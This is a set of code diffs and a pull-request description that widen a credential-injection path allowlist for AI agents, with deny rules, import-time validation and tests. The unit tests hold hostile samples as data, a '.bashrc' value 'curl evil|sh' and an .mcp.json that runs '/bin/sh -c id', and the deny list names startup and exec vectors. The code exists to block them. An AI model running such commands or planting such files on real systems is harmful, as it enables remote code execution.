@@ -267,14 +325,23 @@ class CredentialEncryptionService:
         Returns:
             Path to the encrypted file written
         """
-        # Read credential files from agent
-        files = await self.read_agent_credential_files(agent_name, file_paths)
+        # Discover the full injected credential set (#11). When the caller
+        # doesn't pin paths, ask the agent which allow-policy files exist; fall
+        # back to the legacy 2-file default on older images without /list.
+        if file_paths is None:
+            discovered = await self.list_agent_credential_files(agent_name)
+            file_paths = discovered or DEFAULT_CREDENTIAL_FILES
+        # Never fold a prior archive into the new one.
+        file_paths = [p for p in file_paths if p != ".credentials.enc"]
 
-        if not files:
+        # Read split into text + binary
+        files, files_b64 = await self.read_agent_credential_files_split(agent_name, file_paths)
+
+        if not files and not files_b64:
             raise ValueError("No credential files found to export")
 
-        # Encrypt
-        encrypted = self.encrypt(files)
+        # Encrypt the full set (binary-capable v2 archive)
+        encrypted = self.encrypt_files(files, files_b64)
 
         # Write .credentials.enc to agent workspace
         await self.write_agent_credential_files(
@@ -282,7 +349,8 @@ class CredentialEncryptionService:
             {".credentials.enc": encrypted}
         )
 
-        logger.info(f"Exported {len(files)} credential files to .credentials.enc for agent {agent_name}")
+        total = len(files) + len(files_b64)
+        logger.info(f"Exported {total} credential files to .credentials.enc for agent {agent_name}")
 
         return ".credentials.enc"
 
@@ -314,18 +382,19 @@ class CredentialEncryptionService:
                 "No .credentials.enc file found in agent workspace"
             )
 
-        # Decrypt
-        credential_files = self.decrypt(encrypted)
+        # Decrypt (handles v2 binary archives AND legacy flat archives)
+        files, files_b64 = self.decrypt_files(encrypted)
 
-        if not credential_files:
+        if not files and not files_b64:
             raise ValueError("Encrypted file contains no credential files")
 
-        # Write decrypted files to agent
-        await self.write_agent_credential_files(agent_name, credential_files)
+        # Write decrypted files to agent (text + binary)
+        await self.write_agent_credential_files(agent_name, files, files_b64)
 
-        logger.info(f"Imported {len(credential_files)} credential files from .credentials.enc for agent {agent_name}")
+        total = len(files) + len(files_b64)
+        logger.info(f"Imported {total} credential files from .credentials.enc for agent {agent_name}")
 
-        return credential_files
+        return {**files, **files_b64}
 
 
 # Singleton instance

--- a/src/backend/services/credential_encryption.py
+++ b/src/backend/services/credential_encryption.py
@@ -43,6 +43,29 @@ DEFAULT_CREDENTIAL_FILES = [".env", ".mcp.json"]
 _ARCHIVE_V2_MARKER = "__cred_archive_v2__"
 
 
+def validate_credential_set(files: Dict[str, str], files_b64: Dict[str, str] = None) -> None:
+    """Enforce the curated credential policy + `.mcp.json` content guard over a
+    text/binary credential set (#11 review). Raises ``ValueError`` on violation.
+
+    Used on the IMPORT boundary so the backend re-validates a decrypted archive
+    before writing — the dual-layer (backend + agent-server) the issue mandates,
+    rather than trusting the downstream /inject check alone. The user-facing
+    inject router enforces the same rules inline (HTTP 400)."""
+    from services.credential_paths import disallowed_paths
+    files_b64 = files_b64 or {}
+    bad = disallowed_paths(list(files) + list(files_b64))
+    if bad:
+        raise ValueError(f"Archive contains disallowed credential path(s): {bad}")
+    if ".mcp.json" in files_b64:
+        raise ValueError(".mcp.json may not be binary (content must be validatable)")
+    if ".mcp.json" in files:
+        from services.mcp_validator import validate_mcp_config, McpValidationError
+        try:
+            validate_mcp_config(files[".mcp.json"])
+        except McpValidationError as e:
+            raise ValueError(f"Invalid .mcp.json in archive: {e}")
+
+
 class CredentialsFileNotFoundError(ValueError):
     """Raised by ``import_to_agent`` when ``.credentials.enc`` is absent.
 
@@ -387,6 +410,12 @@ class CredentialEncryptionService:
 
         if not files and not files_b64:
             raise ValueError("Encrypted file contains no credential files")
+
+        # #11 review: enforce the curated policy + .mcp.json content guard on the
+        # IMPORT boundary too (backend layer), not only the agent-server /inject
+        # layer. An archive can only be forged with the server key, but dual-layer
+        # is the issue's invariant — don't rely solely on the downstream check.
+        validate_credential_set(files, files_b64)
 
         # Write decrypted files to agent (text + binary)
         await self.write_agent_credential_files(agent_name, files, files_b64)

--- a/src/backend/services/credential_encryption.py
+++ b/src/backend/services/credential_encryption.py
@@ -346,7 +346,7 @@ class CredentialEncryptionService:
             file_paths: List of file paths to export
 
         Returns:
-            Path to the encrypted file written
+            (path_to_encrypted_file, number_of_files_captured)
         """
         # Discover the full injected credential set (#11). When the caller
         # doesn't pin paths, ask the agent which allow-policy files exist; fall
@@ -375,7 +375,7 @@ class CredentialEncryptionService:
         total = len(files) + len(files_b64)
         logger.info(f"Exported {total} credential files to .credentials.enc for agent {agent_name}")
 
-        return ".credentials.enc"
+        return ".credentials.enc", total
 
     async def import_to_agent(self, agent_name: str) -> Dict[str, str]:
         """

--- a/src/backend/services/credential_paths.py
+++ b/src/backend/services/credential_paths.py
@@ -59,6 +59,12 @@ DENY_GLOBS = [
     ".git/**", ".gitconfig",
     # anything on PATH
     "bin/**", ".local/bin/**",
+    # vendored / dependency / cache trees — keeps the broad cert globs
+    # (*.pem/*.key/*.crt) from matching bundled CA files (e.g. certifi's
+    # cacert.pem) and sweeping them into export's `/list` walk (#11 live test).
+    "node_modules/**", "**/node_modules/**",
+    "site-packages/**", "**/site-packages/**",
+    ".local/**", ".venv/**", "venv/**", ".cache/**", "go/pkg/**",
 ]
 
 

--- a/src/backend/services/credential_paths.py
+++ b/src/backend/services/credential_paths.py
@@ -34,7 +34,11 @@ ALLOW_EXACT = {".env", ".credentials.enc", ".mcp.json"}
 # matches one or more whole segments); a pattern with no "/" is matched against
 # the path's BASENAME (so "*.pem" allows a .pem anywhere not under a denied dir).
 ALLOW_GLOBS = [
-    ".config/gcloud/**",   # cloud SDK ADC / service-account JSON
+    # cloud SDK ADC / service-account JSON. NOTE: a workload-identity ADC file
+    # can declare an `executable` credential_source; google-auth only honors it
+    # when GOOGLE_EXTERNAL_ACCOUNT_ALLOW_EXECUTABLES=1 (non-default), so it is
+    # not an injection→exec vector here — but don't set that env var fleet-wide.
+    ".config/gcloud/**",
     ".kube/config",        # kubeconfig
     "*.pem", "*.key", "*.crt", "*.cert", "*.p12", "*.pfx",  # TLS / cert material
     ".ssh/id_*",           # SSH private/public keys (NOT authorized_keys/config)
@@ -96,6 +100,12 @@ def is_allowed_credential_path(path: str) -> bool:
     if any(s in ("", ".", "..") for s in segs):   # empty / "." / traversal
         return False
     if any(_matches(path, d) for d in DENY_GLOBS):  # deny precedence
+        return False
+    # `.ssh/` is high-risk: permit ONLY `id_*` key files — even a file that
+    # would otherwise match `*.pem`/`*.key`. ssh never auto-loads a stray key,
+    # but this keeps the most sensitive dir to exactly the intent ("SSH keys =
+    # id_*") instead of "any cert-shaped file under .ssh" (#11 review).
+    if segs[0] == ".ssh" and not fnmatch.fnmatchcase(segs[-1], "id_*"):
         return False
     if path in ALLOW_EXACT:
         return True

--- a/src/backend/services/credential_paths.py
+++ b/src/backend/services/credential_paths.py
@@ -1,0 +1,107 @@
+"""Curated credential-path policy for CRED-002 injection (enterprise#11).
+
+Single source of truth for *which* workspace paths may be written by the
+user-facing credential-injection flow. Widens the original 3-path exact
+allowlist (#183/#590/#598) to a curated set of credential file *types* — cloud
+service-account JSON, TLS cert/key material, kubeconfigs, SSH keys — WITHOUT
+reopening the arbitrary-path RCE surface the allowlist was built to close.
+
+Policy model (deny takes precedence over allow):
+  accepted  ==  (relative, no traversal)  AND  (matches an ALLOW rule)
+                                          AND  (matches NO DENY rule)
+
+Anything that is executed or sourced at shell/agent startup stays blocked
+regardless of ALLOW (shell rc files, CLAUDE.md/AGENTS.md, .claude/**,
+.mcp.json.template, .ssh/authorized_keys & config, .git/** & .gitconfig, bin/**).
+`.mcp.json` passes the PATH layer here but is still CONTENT-validated by
+`services.mcp_validator` (the #590/#598 guard) at the call site.
+
+IMPORTANT: this module is vendored byte-identically into the agent base image at
+``docker/base-image/agent_server/credential_paths.py`` (the agent server is a
+separate image and cannot import ``src/backend``). The two copies MUST stay
+byte-identical — a parity test enforces it (Invariant #5, defense in depth).
+Keep this module pure-stdlib and free of repo-specific imports so the copy is
+literally identical.
+"""
+from __future__ import annotations
+
+import fnmatch
+
+# Exact full-path matches (workspace root only).
+ALLOW_EXACT = {".env", ".credentials.enc", ".mcp.json"}
+
+# Glob rules. A pattern containing "/" is matched segment-by-segment ("**"
+# matches one or more whole segments); a pattern with no "/" is matched against
+# the path's BASENAME (so "*.pem" allows a .pem anywhere not under a denied dir).
+ALLOW_GLOBS = [
+    ".config/gcloud/**",   # cloud SDK ADC / service-account JSON
+    ".kube/config",        # kubeconfig
+    "*.pem", "*.key", "*.crt", "*.cert", "*.p12", "*.pfx",  # TLS / cert material
+    ".ssh/id_*",           # SSH private/public keys (NOT authorized_keys/config)
+]
+
+# Deny rules — precedence over ALLOW. Nothing here may ever be written, even if
+# it would match an ALLOW glob (e.g. a "*.key" placed under .ssh or .claude).
+DENY_GLOBS = [
+    # shell startup (sourced at login / non-interactive shells)
+    ".bashrc", ".bash_profile", ".bash_login", ".bash_logout", ".profile",
+    ".zshrc", ".zprofile", ".zshenv", ".kshrc", ".cshrc",
+    ".config/fish/**", ".config/systemd/**", ".config/environment.d/**",
+    # agent / AI instruction + config (executed/interpreted at agent startup)
+    "CLAUDE.md", "AGENTS.md", ".claude/**", ".mcp.json.template",
+    # ssh login / command-execution vectors
+    ".ssh/authorized_keys", ".ssh/config", ".ssh/known_hosts", ".ssh/environment",
+    # git hook / fsmonitor command execution
+    ".git/**", ".gitconfig",
+    # anything on PATH
+    "bin/**", ".local/bin/**",
+]
+
+
+def _match_segs(pat: list[str], path: list[str]) -> bool:
+    if not pat:
+        return not path
+    if pat[0] == "**":
+        if len(pat) == 1:
+            return len(path) >= 1          # "**" = one or more segments
+        for i in range(1, len(path) + 1):
+            if _match_segs(pat[1:], path[i:]):
+                return True
+        return False
+    if not path:
+        return False
+    if not fnmatch.fnmatchcase(path[0], pat[0]):
+        return False
+    return _match_segs(pat[1:], path[1:])
+
+
+def _matches(path: str, pattern: str) -> bool:
+    if "/" in pattern:
+        return _match_segs(pattern.split("/"), path.split("/"))
+    # bare pattern → match the basename, so it applies anywhere in the tree
+    return fnmatch.fnmatchcase(path.split("/")[-1], pattern)
+
+
+def is_allowed_credential_path(path: str) -> bool:
+    """True iff ``path`` (relative to the agent home) is a permitted credential
+    file. Rejects absolute paths, traversal, and anything matching a DENY rule;
+    accepts ALLOW_EXACT and ALLOW_GLOBS otherwise."""
+    if not path or not isinstance(path, str):
+        return False
+    if "\x00" in path or "\\" in path:        # null byte / Windows separator
+        return False
+    if path.startswith("/"):                  # absolute
+        return False
+    segs = path.split("/")
+    if any(s in ("", ".", "..") for s in segs):   # empty / "." / traversal
+        return False
+    if any(_matches(path, d) for d in DENY_GLOBS):  # deny precedence
+        return False
+    if path in ALLOW_EXACT:
+        return True
+    return any(_matches(path, a) for a in ALLOW_GLOBS)
+
+
+def disallowed_paths(paths) -> list[str]:
+    """Return the subset of ``paths`` that are NOT permitted (empty = all ok)."""
+    return [p for p in paths if not is_allowed_credential_path(p)]

--- a/src/frontend/src/components/CredentialsPanel.vue
+++ b/src/frontend/src/components/CredentialsPanel.vue
@@ -177,6 +177,46 @@
         </div>
       </div>
 
+      <!-- Upload Credential File (#11 — service-account JSON, certs/keys, SSH) -->
+      <div class="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700">
+        <div class="px-4 py-3 border-b border-gray-200 dark:border-gray-700">
+          <h3 class="text-lg font-medium text-gray-900 dark:text-white">Upload Credential File</h3>
+          <p class="text-sm text-gray-500 dark:text-gray-400 mt-1">
+            For cloud service-account JSON (.config/gcloud/…), TLS certs/keys
+            (*.pem/*.key/*.crt/*.p12/*.pfx), kubeconfig (.kube/config) and SSH keys
+            (.ssh/id_*). Binary files are handled automatically.
+          </p>
+        </div>
+        <div class="p-4 space-y-3">
+          <input
+            type="file"
+            @change="onCredFilePicked"
+            :disabled="agentStatus !== 'running' || uploadLoading"
+            class="block w-full text-sm text-gray-700 dark:text-gray-300"
+          />
+          <input
+            v-model="uploadPath"
+            placeholder="Destination path (e.g. .config/gcloud/sa.json, client.pem, .ssh/id_ed25519)"
+            :disabled="agentStatus !== 'running' || uploadLoading"
+            class="w-full font-mono text-sm border border-gray-300 dark:border-gray-600 rounded-lg p-2 bg-white dark:bg-gray-900 text-gray-900 dark:text-gray-100"
+          />
+          <div class="flex items-center justify-between">
+            <span class="text-xs text-gray-500 dark:text-gray-400">Written 0600; created on the agent's next sync if git-tracked.</span>
+            <button
+              @click="uploadCredFile"
+              :disabled="agentStatus !== 'running' || uploadLoading || !uploadFile || !uploadPath.trim()"
+              class="inline-flex items-center px-4 py-2 text-sm font-medium rounded-md text-white bg-blue-600 hover:bg-blue-700 disabled:bg-gray-400 disabled:cursor-not-allowed"
+            >
+              {{ uploadLoading ? 'Uploading...' : 'Upload' }}
+            </button>
+          </div>
+          <div v-if="uploadResult"
+               :class="['p-3 rounded-lg text-sm', uploadResult.success ? 'bg-status-success-50 dark:bg-status-success-900/30 text-status-success-800 dark:text-status-success-300' : 'bg-status-danger-50 dark:bg-status-danger-900/30 text-status-danger-800 dark:text-status-danger-300']">
+            {{ uploadResult.message }}
+          </div>
+        </div>
+      </div>
+
       <!-- File Editor Modal -->
       <div v-if="editingFile" class="fixed inset-0 z-50 overflow-y-auto">
         <div class="flex items-center justify-center min-h-screen p-4">
@@ -260,6 +300,11 @@ const importing = ref(false)
 const quickInjectText = ref('')
 const quickInjectLoading = ref(false)
 const quickInjectResult = ref(null)
+// #11 — credential file upload (service-account JSON, certs/keys, SSH)
+const uploadFile = ref(null)
+const uploadPath = ref('')
+const uploadLoading = ref(false)
+const uploadResult = ref(null)
 const editingFile = ref(null)
 const editingContent = ref('')
 const savingFile = ref(false)
@@ -401,6 +446,49 @@ const quickInject = async () => {
     }
   } finally {
     quickInjectLoading.value = false
+  }
+}
+
+// #11 — pick a credential file; default the destination path to its name.
+const onCredFilePicked = (e) => {
+  const f = e.target.files && e.target.files[0]
+  uploadFile.value = f || null
+  uploadResult.value = null
+  if (f && !uploadPath.value.trim()) uploadPath.value = f.name
+}
+
+// Read the picked file and inject it: UTF-8-decodable content goes in `files`
+// (text), otherwise base64 in `files_b64` (binary). Server enforces the policy.
+const uploadCredFile = async () => {
+  if (!uploadFile.value || !uploadPath.value.trim()) return
+  uploadLoading.value = true
+  uploadResult.value = null
+  try {
+    const buf = await uploadFile.value.arrayBuffer()
+    const bytes = new Uint8Array(buf)
+    const path = uploadPath.value.trim()
+    let files = {}, filesB64 = {}
+    try {
+      // strict UTF-8 decode — throws on invalid byte sequences (binary)
+      files[path] = new TextDecoder('utf-8', { fatal: true }).decode(bytes)
+    } catch {
+      let bin = ''
+      for (let i = 0; i < bytes.length; i++) bin += String.fromCharCode(bytes[i])
+      filesB64[path] = btoa(bin)
+    }
+    await agentsStore.injectCredentials(props.agentName, files, filesB64)
+    uploadResult.value = { success: true, message: `Uploaded ${path}` }
+    uploadFile.value = null
+    uploadPath.value = ''
+    await loadCredentialStatus()
+    if (showNotification) showNotification('Credential file uploaded', 'success')
+  } catch (err) {
+    uploadResult.value = {
+      success: false,
+      message: err.response?.data?.detail || err.message || 'Upload failed',
+    }
+  } finally {
+    uploadLoading.value = false
   }
 }
 

--- a/src/frontend/src/stores/agents.js
+++ b/src/frontend/src/stores/agents.js
@@ -293,10 +293,10 @@ export const useAgentsStore = defineStore('agents', {
     },
 
     // Simplified Credential System (CRED-002)
-    async injectCredentials(name, files) {
+    async injectCredentials(name, files, filesB64 = {}) {
       const authStore = useAuthStore()
       const response = await axios.post(`/api/agents/${name}/credentials/inject`,
-        { files },
+        { files, files_b64: filesB64 },
         { headers: authStore.authHeader }
       )
       return response.data

--- a/src/mcp-server/src/client.ts
+++ b/src/mcp-server/src/client.ts
@@ -383,7 +383,11 @@ export class TrinityClient {
    * @param name - Agent name
    * @param files - Map of file paths to contents (e.g., {".env": "KEY=value"})
    */
-  async injectCredentials(name: string, files: Record<string, string>): Promise<{
+  async injectCredentials(
+    name: string,
+    files: Record<string, string>,
+    filesB64: Record<string, string> = {},
+  ): Promise<{
     status: string;
     files_written: string[];
     message: string;
@@ -395,7 +399,7 @@ export class TrinityClient {
     }>(
       "POST",
       `/api/agents/${encodeURIComponent(name)}/credentials/inject`,
-      { files }
+      { files, files_b64: filesB64 }
     );
   }
 

--- a/src/mcp-server/src/tools/agents.ts
+++ b/src/mcp-server/src/tools/agents.ts
@@ -470,24 +470,31 @@ export function createAgentTools(
       description:
         "Inject credential files directly into a running agent's workspace. " +
         "This is the new simplified credential system that writes files directly " +
-        "without Redis or template processing. Supports .env, .mcp.json, and other files. " +
-        "The agent must be running.",
+        "without Redis or template processing. Supports a curated set of credential " +
+        "file types: .env, .mcp.json, cloud service-account JSON (.config/gcloud/**), " +
+        "kubeconfig (.kube/config), TLS/cert material (*.pem/*.key/*.crt/*.p12/*.pfx), " +
+        "and SSH keys (.ssh/id_*). Use files_b64 for binary material. The agent must be running.",
       parameters: z.object({
         name: z.string().describe("The name of the agent to inject credentials into"),
-        files: z.record(z.string()).describe(
-          'Map of file paths to contents. Example: {".env": "KEY=value\\nSECRET=xxx", ".mcp.json": "{}"}'
+        files: z.record(z.string()).optional().describe(
+          'Map of file paths to TEXT contents. Example: {".env": "KEY=value", ".config/gcloud/sa.json": "{...}"}'
+        ),
+        files_b64: z.record(z.string()).optional().describe(
+          'Map of file paths to BASE64-encoded binary contents (e.g. .p12/.pfx/DER cert material).'
         ),
       }),
       execute: async (
-        { name, files }: { name: string; files: Record<string, string> },
+        { name, files, files_b64 }: { name: string; files?: Record<string, string>; files_b64?: Record<string, string> },
         context?: { session?: McpAuthContext }
       ) => {
         const authContext = context?.session;
         const apiClient = getClient(authContext);
 
-        console.log(`[inject_credentials] Injecting ${Object.keys(files).length} file(s) into agent '${name}'`);
+        const textFiles = files || {};
+        const binFiles = files_b64 || {};
+        console.log(`[inject_credentials] Injecting ${Object.keys(textFiles).length + Object.keys(binFiles).length} file(s) into agent '${name}'`);
 
-        const result = await apiClient.injectCredentials(name, files);
+        const result = await apiClient.injectCredentials(name, textFiles, binFiles);
         return JSON.stringify(result, null, 2);
       },
     },

--- a/tests/unit/test_credential_archive_binary.py
+++ b/tests/unit/test_credential_archive_binary.py
@@ -46,3 +46,36 @@ def test_single_secret_callers_unaffected():
     """SIEM/2FA/SSO use encrypt({k: v}) / decrypt()[k] — must be untouched."""
     svc = _svc()
     assert svc.decrypt(svc.encrypt({"oidc_client_secret": "shh"})) == {"oidc_client_secret": "shh"}
+
+
+# ---- import/inject boundary validation (#11 sec review) ----
+
+import pytest
+from services.credential_encryption import validate_credential_set
+
+
+def test_validate_accepts_clean_set():
+    validate_credential_set({".env": "A=1\n", ".config/gcloud/sa.json": "{}"},
+                            {"client.p12": "YWJj"})  # no raise
+
+
+def test_validate_rejects_mcp_json_as_binary():
+    """Finding #1: .mcp.json via the binary channel bypasses content validation
+    — must be rejected outright."""
+    with pytest.raises(ValueError, match="mcp.json"):
+        validate_credential_set({}, {".mcp.json": "eyJ9"})
+
+
+def test_validate_rejects_disallowed_path_in_archive():
+    """Finding #2: a decrypted archive carrying a dangerous path is blocked at
+    the backend import boundary (dual-layer), not just at the agent-server."""
+    with pytest.raises(ValueError, match="disallowed"):
+        validate_credential_set({".bashrc": "curl evil|sh"}, {})
+
+
+def test_validate_rejects_weaponized_mcp_json_content():
+    """A stdio `command` MCP server in .mcp.json (the #590 RCE class) is caught
+    by content validation on the import path too."""
+    evil = '{"mcpServers": {"x": {"command": "/bin/sh", "args": ["-c", "id"]}}}'
+    with pytest.raises(ValueError):
+        validate_credential_set({".mcp.json": evil}, {})

--- a/tests/unit/test_credential_archive_binary.py
+++ b/tests/unit/test_credential_archive_binary.py
@@ -1,0 +1,48 @@
+"""Binary-safe `.credentials.enc` round-trip (#11).
+
+The v2 archive carries text in ``files`` and base64 binary in ``files_b64`` so
+cert/key material (.p12/.pfx/DER) survives export → import. Legacy flat
+archives (and the single-secret SIEM/2FA/SSO callers) must keep working
+unchanged through ``encrypt``/``decrypt``.
+"""
+from __future__ import annotations
+
+import base64
+
+from services.credential_encryption import CredentialEncryptionService
+
+_KEY = "ab" * 32  # 64 hex chars → 32 bytes
+
+
+def _svc():
+    return CredentialEncryptionService(key=_KEY)
+
+
+def test_text_and_binary_round_trip():
+    svc = _svc()
+    raw = bytes(range(256)) * 4  # non-UTF-8 binary blob
+    text = {".env": "A=1\n", ".config/gcloud/sa.json": '{"type":"service_account"}'}
+    binary = {"client.p12": base64.b64encode(raw).decode("ascii")}
+
+    blob = svc.encrypt_files(text, binary)
+    files, files_b64 = svc.decrypt_files(blob)
+
+    assert files == text
+    assert files_b64 == binary
+    assert base64.b64decode(files_b64["client.p12"]) == raw  # bytes intact
+
+
+def test_legacy_flat_archive_still_decrypts():
+    """An archive written by the old `encrypt({path: text})` path reads back as
+    all-text with no binary (back-compat)."""
+    svc = _svc()
+    legacy = svc.encrypt({".env": "A=1\n", ".mcp.json": "{}"})
+    files, files_b64 = svc.decrypt_files(legacy)
+    assert files == {".env": "A=1\n", ".mcp.json": "{}"}
+    assert files_b64 == {}
+
+
+def test_single_secret_callers_unaffected():
+    """SIEM/2FA/SSO use encrypt({k: v}) / decrypt()[k] — must be untouched."""
+    svc = _svc()
+    assert svc.decrypt(svc.encrypt({"oidc_client_secret": "shh"})) == {"oidc_client_secret": "shh"}

--- a/tests/unit/test_credential_inject_allowlist.py
+++ b/tests/unit/test_credential_inject_allowlist.py
@@ -209,6 +209,11 @@ class TestStillBlockedAfterWidening:
         ".gitconfig", ".git/hooks/pre-commit",
         # on PATH
         "bin/x", ".local/bin/x",
+        # #11 live test: vendored cert bundles must NOT match the *.pem/*.key
+        # globs (export's /list walk was sweeping certifi's cacert.pem)
+        ".local/lib/python3.13/site-packages/certifi/cacert.pem",
+        "node_modules/foo/test.key", "project/node_modules/x/y.pem",
+        ".venv/lib/cert.pem", ".cache/whatever.crt",
         # traversal / absolute / backslash
         "../escape.pem", "/abs/x.key", ".ssh\\id_rsa",
     ])

--- a/tests/unit/test_credential_inject_allowlist.py
+++ b/tests/unit/test_credential_inject_allowlist.py
@@ -13,19 +13,19 @@ Path-level history:
 - #590 (2026-04-30) — removed .mcp.json + .mcp.json.template (AISEC-C2 RCE)
 - #598 (Layer 2)    — re-allowed .mcp.json (gated by structure validation
                        at the content layer); .mcp.json.template stays out
+- #11               — widened to curated credential file TYPES (cloud SA JSON,
+                       PEM/key/cert, SSH id_*); deny-list keeps startup/exec
+                       paths out. Policy now lives in services/credential_paths.
 
-Module: src/backend/routers/credentials.py
+Module: src/backend/services/credential_paths.py
 """
 
 import pytest
 
-# Inline mirror of the path allowlist in src/backend/routers/credentials.py
-ALLOWED_CREDENTIAL_PATHS = {".env", ".credentials.enc", ".mcp.json"}
-
-
-def validate_credential_paths(files: dict) -> list:
-    """Return list of disallowed paths. Empty list means all paths are valid."""
-    return [p for p in files if p not in ALLOWED_CREDENTIAL_PATHS]
+# Exercise the REAL curated policy (#11) — single source of truth, also
+# vendored byte-identically into the agent image (see parity test). Aliased so
+# the existing assertions below run unchanged against the real implementation.
+from services.credential_paths import disallowed_paths as validate_credential_paths
 
 
 # ---- Tests: Allowed paths ----
@@ -168,3 +168,47 @@ class TestEdgeCases:
     def test_null_byte_in_path(self):
         disallowed = validate_credential_paths({".env\x00.txt": "KEY=val"})
         assert len(disallowed) == 1
+
+
+# ---- Tests: newly-allowed credential TYPES (#11) ----
+
+class TestNewlyAllowedTypes:
+    """The curated widening — these MUST now be accepted."""
+
+    @pytest.mark.parametrize("path", [
+        ".config/gcloud/application_default_credentials.json",
+        ".config/gcloud/legacy_credentials/x/adc.json",
+        ".kube/config",
+        "client.pem", "certs/server.crt", "tls/private.key",
+        "intermediate.cert", "bundle.p12", "store.pfx",
+        ".ssh/id_rsa", ".ssh/id_ed25519", ".ssh/id_rsa.pub",
+    ])
+    def test_allowed(self, path):
+        assert validate_credential_paths({path: "x"}) == []
+
+
+# ---- Tests: dangerous paths the widening must STILL block (#11) ----
+
+class TestStillBlockedAfterWidening:
+    """Deny-list precedence: even paths that look cert-ish must stay blocked
+    when they enable code execution or startup/login hijack."""
+
+    @pytest.mark.parametrize("path", [
+        # shell startup
+        ".bashrc", ".bash_profile", ".profile", ".zshrc", ".zshenv",
+        ".config/fish/config.fish",
+        # agent / AI config
+        "CLAUDE.md", "AGENTS.md", ".claude/settings.json", ".mcp.json.template",
+        # a cert-looking file under a denied dir → deny precedence wins
+        ".claude/evil.pem", ".config/systemd/user/x.key",
+        # ssh login / command-exec vectors
+        ".ssh/authorized_keys", ".ssh/config", ".ssh/known_hosts", ".ssh/rc",
+        # git hook / fsmonitor exec
+        ".gitconfig", ".git/hooks/pre-commit",
+        # on PATH
+        "bin/x", ".local/bin/x",
+        # traversal / absolute / backslash
+        "../escape.pem", "/abs/x.key", ".ssh\\id_rsa",
+    ])
+    def test_blocked(self, path):
+        assert validate_credential_paths({path: "x"}) == [path]

--- a/tests/unit/test_credential_inject_allowlist.py
+++ b/tests/unit/test_credential_inject_allowlist.py
@@ -203,6 +203,8 @@ class TestStillBlockedAfterWidening:
         ".claude/evil.pem", ".config/systemd/user/x.key",
         # ssh login / command-exec vectors
         ".ssh/authorized_keys", ".ssh/config", ".ssh/known_hosts", ".ssh/rc",
+        # #11 review: .ssh locked to id_* — even cert-shaped files blocked
+        ".ssh/secret.key", ".ssh/server.pem",
         # git hook / fsmonitor exec
         ".gitconfig", ".git/hooks/pre-commit",
         # on PATH

--- a/tests/unit/test_credential_paths_parity.py
+++ b/tests/unit/test_credential_paths_parity.py
@@ -1,0 +1,31 @@
+"""Parity guard for the credential-path policy (#11, Invariant #5).
+
+The agent server is a separate image and cannot import ``src/backend``, so the
+curated policy is vendored into the base image. Both copies MUST stay
+byte-identical — otherwise the backend gate and the agent-server second layer
+could diverge and one would enforce a different allowlist than the other.
+
+Edit the canonical file (``src/backend/services/credential_paths.py``) and copy
+it over the agent-server vendored file to keep this green.
+"""
+from __future__ import annotations
+
+from pathlib import Path
+
+_ROOT = Path(__file__).resolve().parents[2]
+_CANON = _ROOT / "src/backend/services/credential_paths.py"
+_VENDORED = _ROOT / "docker/base-image/agent_server/credential_paths.py"
+
+
+def test_policy_copies_are_byte_identical():
+    assert _CANON.exists() and _VENDORED.exists()
+    assert _CANON.read_bytes() == _VENDORED.read_bytes(), (
+        "credential_paths.py drifted between backend and agent-server — "
+        "re-copy the canonical file over the vendored one."
+    )
+
+
+def test_canonical_policy_behaves():
+    from services.credential_paths import is_allowed_credential_path as ok
+    assert ok(".config/gcloud/sa.json") and ok("client.pem") and ok(".ssh/id_rsa")
+    assert not ok(".bashrc") and not ok("../x") and not ok(".ssh/authorized_keys")


### PR DESCRIPTION
## What

Widens CRED-002 credential injection from the fixed 3-path exact allowlist (`.env`/`.credentials.enc`/`.mcp.json`) to a **curated set of credential file types** — cloud service-account JSON, TLS cert/key material, kubeconfigs, SSH keys — **without** reopening the arbitrary-path RCE surface the allowlist closed (#183/#590/#598).

Related to **Abilityai/trinity-enterprise#11** (filed in the enterprise tracker; all code is OSS — base `dev`).

## How

- **Single-source policy** `services/credential_paths.py` (`is_allowed_credential_path`): ALLOW `.config/gcloud/**`, `.kube/config`, `*.pem`/`*.key`/`*.crt`/`*.cert`/`*.p12`/`*.pfx`, `.ssh/id_*` (+ the existing exact set, `.mcp.json` still content-validated). **Deny-list takes precedence** over ALLOW and blocks everything executed/sourced at startup (shell rc, `CLAUDE.md`/`AGENTS.md`/`.claude/**`, `.mcp.json.template`, `.ssh/authorized_keys`/`config`/`known_hosts`, `.git*`/`.gitconfig`, `bin/**`) plus `..`/absolute/backslash traversal.
- **Two-layer enforcement (Invariant #5):** the policy is **vendored byte-identically** into `docker/base-image/agent_server/credential_paths.py` (parity test enforces it). The agent-server write loops also gained a **resolve-under-home traversal guard the original code lacked** (today the backend gate was the only one).
- **Binary-safe:** inject carries `files_b64` (base64 → `write_bytes`); `.credentials.enc` becomes a v2 `{files, files_b64}` envelope (legacy flat archives still decrypt). `encrypt`/`decrypt` stay flat for the single-secret callers (SIEM/2FA/SSO) — only the new `encrypt_files`/`decrypt_files` handle binary.
- **Export captures the full set:** new agent `GET /api/credentials/list` discovers all policy-matching files so export→import round-trips everything injected (was just the 2 defaults).
- **Three surfaces in sync (Invariant #13):** MCP `inject_credentials` gains `files_b64`; frontend Credentials panel gains a file-upload affordance (UTF-8 vs base64 auto-detected).

## Tests

61 pass: the existing allowlist test now exercises the **real** policy (newly-allowed types + still-blocked dangerous paths), + a `credential_paths` byte-identity parity test + a binary archive round-trip test. `test_mcp_validator` + `test_files_guardrail_bypass` unaffected.

## Security

This intentionally loosens a deliberately-tight boundary. Posture preserved: deny-precedence, no startup/exec paths, no traversal, second-layer enforcement, `.mcp.json` content-validation. **`/cso` security review required before merge** (per the issue).

🤖 Generated with [Claude Code](https://claude.com/claude-code)